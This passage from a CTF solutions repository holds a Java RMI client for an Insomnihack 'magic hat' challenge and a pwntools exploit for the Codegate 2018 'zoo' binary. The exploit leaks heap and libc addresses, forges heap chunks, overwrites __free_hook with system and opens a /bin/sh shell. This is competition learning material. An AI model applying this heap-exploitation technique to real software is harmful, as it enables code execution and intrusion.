ch.scrt; 5 | 6 | import ch.scrt.WizardAPI; 7 | import ch.scrt.model.Artifact; 8 | import ch.scrt.model.Broomstick; 9 | import ch.scrt.model.Cauldron; 10 | import ch.scrt.model.Frog; 11 | import ch.scrt.model.Gem; 12 | import ch.scrt.model.Hat; 13 | import ch.scrt.model.Lamp; 14 | import ch.scrt.model.Mirror; 15 | import ch.scrt.model.Scroll; 16 | import ch.scrt.model.TeaSet; 17 | import ch.scrt.model.Wand; 18 | import java.io.InputStream; 19 | import java.io.PrintStream; 20 | import java.net.InetAddress; 21 | import java.rmi.Remote; 22 | import java.rmi.registry.LocateRegistry; 23 | import java.rmi.registry.Registry; 24 | import java.util.Properties; 25 | import java.util.Scanner; 26 | import javax.rmi.ssl.SslRMIClientSocketFactory; 27 | import org.apache.commons.lang3.tuple.Pair; 28 | 29 | public class Muggle { 30 | public static void main(String[] args) { 31 | try { 32 | String choice; 33 | /*Properties props = System.getProperties(); 34 | props.setProperty("javax.net.ssl.trustStore", "magic_hat_truststore"); 35 | props.setProperty("javax.net.ssl.trustStorePassword", "magic_hat"); 36 | Registry registry = LocateRegistry.getRegistry(InetAddress.getByName("magichat.teaser.insomnihack.ch").getHostName(), 51966, new SslRMIClientSocketFactory()); 37 | */ 38 | Registry registry = LocateRegistry.getRegistry(InetAddress.getByName("localhost").getHostName(), 2020); 39 | WizardAPI wizardAPI = (WizardAPI)registry.lookup("Wizard"); 40 | Scanner s = new Scanner(System.in); 41 | for (int idx = 0; idx < 2; ++idx) { 42 | System.out.println(wizardAPI.message(idx)); 43 | System.out.print("[c]ontinue\n> "); 44 | choice = ""; 45 | while (!choice.equals("c")) { 46 | choice = s.nextLine(); 47 | } 48 | } 49 | Hat magicHat = wizardAPI.getMagicHat(); 50 | System.out.println("*you received a Magic Hat!*"); 51 | choice = ""; 52 | while (!choice.equals("q")) { 53 | System.out.print("[a]dd an artifact inside the Magic Hat\n[s]end the Magic Hat to the Wizard for him to cast a spell\n[i]nspect your hat\n[q]uit \n> "); 54 | block6 : switch (choice = s.nextLine()) { 55 | case "a": { 56 | String artifact; 57 | System.out.print("[b]roomstick\n[c]auldron\n[g]em\n[f]rog\n[h]at\n[l]amp\n[m]irror\n[s]croll\n[t]ea set\n[w]and\n> "); 58 | switch (artifact = s.nextLine()) { 59 | case "b": { 60 | magicHat.add(new Broomstick()); 61 | break block6; 62 | } 63 | case "c": { 64 | magicHat.add(new Cauldron()); 65 | break block6; 66 | } 67 | case "g": { 68 | magicHat.add(new Gem()); 69 | break block6; 70 | } 71 | case "f": { 72 | magicHat.add(new Frog()); 73 | break block6; 74 | } 75 | case "h": { 76 | magicHat.add(new Hat()); 77 | break block6; 78 | } 79 | case "l": { 80 | magicHat.add(new Lamp()); 81 | break block6; 82 | } 83 | case "m": { 84 | magicHat.add(new Mirror()); 85 | break block6; 86 | } 87 | case "s": { 88 | magicHat.add(new Scroll()); 89 | break block6; 90 | } 91 | case "t": { 92 | magicHat.add(new TeaSet()); 93 | break block6; 94 | } 95 | case "w": { 96 | magicHat.add(new Wand()); 97 | break block6; 98 | } 99 | } 100 | System.out.println("*unknown artifact, nothing was added*"); 101 | break; 102 | } 103 | case "s": { 104 | Pair answer = wizardAPI.castASpell(magicHat); 105 | magicHat = answer.getRight(); 106 | System.out.println(answer.getLeft()); 107 | break; 108 | } 109 | case "i": { 110 | System.out.println(Muggle.tabularize("1x " + magicHat.toString())); 111 | break; 112 | } 113 | } 114 | } 115 | } 116 | catch (Exception e) { 117 | System.out.println("Muggle exception: " + e.getMessage()); 118 | e.printStackTrace(); 119 | } 120 | } 121 | 122 | private static String tabularize(String s) { 123 | StringBuilder s2 = new StringBuilder(); 124 | int tabLevel = 0; 125 | for (char c : s.toCharArray()) { 126 | if (c == '[') { 127 | ++tabLevel; 128 | s2.append("\t"); 129 | continue; 130 | } 131 | if (c == ']') { 132 | --tabLevel; 133 | continue; 134 | } 135 | s2.append(c); 136 | if (c != '\n') continue; 137 | for (int i = 0; i < tabLevel; ++i) { 138 | s2.append("\t"); 139 | } 140 | } 141 | return s2.toString(); 142 | } 143 | } 144 | 145 | -------------------------------------------------------------------------------- /codegate-2018/zoo/exploit.py: -------------------------------------------------------------------------------- 1 | """ 2 | This challenge took me about 10-15 hours to solve, which involved around 4-5 3 | hours of reversing. Didn't solve it during the CTF. 4 | 5 | I have written some pseducode in dec.c 6 | 7 | Basic idea: 8 | 9 | 1. Leak heap address by changing setting the length of name of the animal to 0x14. 10 | 2. Trigger the overflow in feed function by feeding/walking appropriately. 11 | 3. Allocate 2 consecutive chunks and free the first one. 12 | 4. Allocate another chunk (the same first one as above) and overflow into the second one. 13 | 5. Overflow such that on freeing the second chunk, it coalesces with an animal chunk at the start. 14 | 6. That animal chunk's feeds[0] and feeds[1] would be taken as 'fd' and 'bk' pointers. 15 | 7. Trigger overflow in that chunk to initialize fd->bk and bk->fd properly. 16 | 8. Allocate chunks from that animal chunk to overwrite 'species' with the heap address of chunk in unsorted bin + 0x10 and leak libc. 17 | 9. Keep on allocating to forge the next animal chunk and set likes > 14. 18 | 10. Walk any existing chunk and overwrite the contents of the animal chunk's feed to clear invalid pointers and also setup pointers to '__free_hook' and '/bin/sh'. 19 | 11. Overwrite free hook with system. 20 | """ 21 | 22 | from pwn import * 23 | 24 | #context.log_level = 'debug' 25 | context.terminal = ['tmux', 'splitw', '-h'] 26 | 27 | file = "./zoo" 28 | 29 | libc = ELF("libc.so.6") 30 | 31 | bin = ELF(file) 32 | 33 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc.so.6")} 34 | conn = process(file, env=env) 35 | #gdb.attach(conn) 36 | 37 | #conn = remote("ch41l3ng3s.codegate.kr", 3333) 38 | 39 | def give_name(name): 40 | conn.recvuntil("enter your name") 41 | conn.send(name) 42 | conn.recvuntil("open your own zoo") 43 | 44 | def menu(choice): 45 | conn.recvuntil("[7] Close the zoo") 46 | conn.sendline(str(choice)) 47 | 48 | def adopt(ch, name): 49 | menu(1) 50 | conn.recvuntil("Lion") 51 | conn.sendline(str(ch)) 52 | conn.recvuntil("Please name the animal") 53 | conn.send(name) 54 | 55 | def feed(name, m_name=None, m_desc=None): 56 | """malloc(0x80), [malloc(0x80)]""" 57 | menu(2) 58 | conn.recvuntil("animal will you feed") 59 | conn.send(name) 60 | if m_name is not None: 61 | conn.recvuntil("name of this medicine") 62 | conn.send(m_name) 63 | conn.recvuntil("description of this medicine") 64 | conn.send(m_desc) 65 | 66 | def clean(name): 67 | """free(dung)""" 68 | menu(3) 69 | conn.recvuntil("animal's dung will you clean?") 70 | conn.send(name) 71 | conn.recvuntil("Good job") 72 | 73 | def walk(name, messages = None): 74 | """free(feed)""" 75 | menu(4) 76 | conn.recvuntil("animal do you want to take") 77 | conn.send(name) 78 | if messages is not None: 79 | for message in messages: 80 | conn.recvuntil("You can give a msg") 81 | conn.send(message) 82 | 83 | def hospital(name): 84 | menu(5) 85 | conn.recvuntil("animal will you take") 86 | conn.send(name) 87 | 88 | def list(name): 89 | menu(6) 90 | conn.recvuntil("animal info do you") 91 | conn.send(name) 92 | 93 | give_name("vampire\n") 94 | 95 | # Leaking heap address 96 | adopt(1, "a"*0x14) 97 | feed("a"*0x14) 98 | conn.recvuntil("a"*0x14) 99 | heap_addr = u64(conn.recvuntil("\x20")[:-1].ljust(8, "\x00")) 100 | 101 | fake_chunk_size = 1560 102 | 103 | adopt(1, "ani1\n") 104 | adopt(1, "dk\n\x00" + p64(0) + p64(fake_chunk_size + 1)) 105 | adopt(1, "ani3\n") 106 | 107 | for i in range(5): 108 | feed("ani1\n") 109 | 110 | # All dungs will be consecutive chunks 111 | for i in range(9): 112 | walk("ani1\n") 113 | feed("ani1\n") 114 | 115 | hospital("ani1\n") 116 | 117 | # Freeing all feeds 118 | for i in range(5): 119 | walk("ani1\n") 120 | 121 | # Creating two consecutive chunks 122 | feed("ani1\n", m_name="aa", m_desc="bb") 123 | feed("ani3\n") 124 | 125 | # Freeing the first one 126 | walk("ani1\n") 127 | 128 | # Overwriting to create a coalesced chunk with dk animal 129 | payload = "\x00"*0x68 + \ 130 | p64(fake_chunk_size) + \ 131 | p64(0x90) 132 | 133 | # Allocating it in ani1 and overflowing into next chunk 134 | feed("ani1\n", m_name="zzzzzzzz", m_desc=payload) 135 | 136 | # Pointing dk's feeds[0] and feeds[1] to setup linked list 137 | # First making dk ill 138 | for i in range(5): 139 | feed("dk\n") 140 | 141 | for i in range(9): 142 | walk("dk\n") 143 | feed("dk\n") 144 | 145 | hospital("dk\n") 146 | 147 | for i in range(6): 148 | feed("dk\n", m_name="aa", m_desc="pp") 149 | 150 | fake_chunk_addr = heap_addr - 0x55e2136828c0 + 0x55e2136823b8 151 | # Forging fd and bk pointers 152 | feed("dk\n", m_name=p64(fake_chunk_addr), m_desc=p64(fake_chunk_addr)) 153 | feed("dk\n", m_name=p64(fake_chunk_addr), m_desc=p64(fake_chunk_addr)) 154 | 155 | walk("ani3\n") 156 | 157 | libc_leak_addr = heap_addr - 0x55a3ebdc58c0 + 0x55a3ebdc54e8 158 | species_addr = heap_addr - 0x560f2a9dc8c0 + 0x560f2a9dc468 159 | 160 | # Now any chunk I allocate, it will be actually dk chunk 161 | # This starts from feed 3 162 | payload = "\x00"*0x50 163 | 164 | feed("ani1\n", m_name=p64(0), m_desc=payload) 165 | feed("ani1\n", m_name=p64(libc_leak_addr), m_desc="bbbb") 166 | 167 | list("dk\n") 168 | conn.recvuntil("Species : ") 169 | libc_leak = u64(conn.recvn(6) + "\x00"*2) 170 | 171 | log.info("Libc Leak: " + hex(libc_leak)) 172 | 173 | #libc.address = libc_leak - 0x7efee9099b78 + 0x7efee8cd5000 174 | libc.address = libc_leak - 0x7fdeda264b78 + 0x7fded9ea0000 175 | 176 | # Making next animal's next initialized != -1 177 | # Name would be "1111" 178 | payload = "\x00"*0x60 + p32(1) + "1111\x00" 179 | feed("ani1\n", m_name="cccc", m_desc=payload) 180 | 181 | # Initial fastbin chunk that can be freed 182 | fast_chunk = heap_addr - 0x55f2ac5268c0 + 0x55f2ac526000 + 0x10 183 | 184 | # Reread the contents of 1111's feed 185 | feed_addr = heap_addr - 0x5651c72c78c0 + 0x5651c72c75b0 186 | feed("ani1\n", m_name=p64(fast_chunk), m_desc=p64(feed_addr)) 187 | feed("ani1\n", m_name="gggg", m_desc="hhhh") 188 | # Overwriting likes, feed_index, etc. of "1111" animal 189 | payload = "2"*0x38 + \ 190 | p32(14) + \ 191 | p32(2) 192 | feed("ani1\n", m_name="iiii", m_desc=payload) 193 | 194 | feed_to_be_freed = heap_addr - 0x55c47a9968c0 + 0x55c47a996950 195 | 196 | messages = [] 197 | messages.append(p64(libc.symbols['__free_hook'] - 0x18) + \ 198 | p64(feed_to_be_freed - 0x18) + p64(0)*10) 199 | messages.append(p64(libc.symbols['system'])) 200 | messages.append("/bin/sh\x00") 201 | 202 | walk("1111\n", messages) # Free fast_chunk 203 | 204 | walk("ani1\n") 205 | 206 | log.info("Leaked heap address: " + hex(heap_addr)) 207 | log.info("Leaked libc address: " + hex(libc_leak)) 208 | 209 | conn.interactive() 210 | --------------------------------------------------------------------------------